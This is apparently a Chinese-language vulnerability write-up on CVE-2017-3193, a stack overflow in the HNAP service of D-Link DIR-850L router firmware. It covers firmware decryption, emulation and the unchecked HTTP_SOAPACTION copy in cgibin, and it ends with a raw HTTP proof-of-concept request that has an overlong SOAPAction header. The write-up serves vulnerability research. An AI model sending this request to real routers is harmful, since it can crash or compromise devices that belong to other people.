CVE-2017-3193
CVE-2017-3193是网站管理接口HNAP服务的栈溢出漏洞,DIR-850L 2.07 build5及之前的固件都可被攻击。
搭建环境
到Dlink官方ftp服务器下载固件
DIR-850L_REVB_FIRMWARE_2.07.B05_WW.ZIP
用binwalk分析,发现没有结果,应该是固件进行了加密,利用文章Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol
里的脚本进行解密。
解密后,binwalk成功分析出内容。
这里使用了firmware-analysis-toolkit进行对固件的模拟。
漏洞分析
存在漏洞的程序为squashfs-root/htdocs/cgibin
定位到HTTP_SOAPACTION查看。
这里从环境变量中获取了HTTP_SOAPACTION的值,未经检查直接放入栈中造成栈溢出。
PoC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/info/Login.html
SOAPAction:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAA
Cookie: uid=vdgBn8ibbO
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
|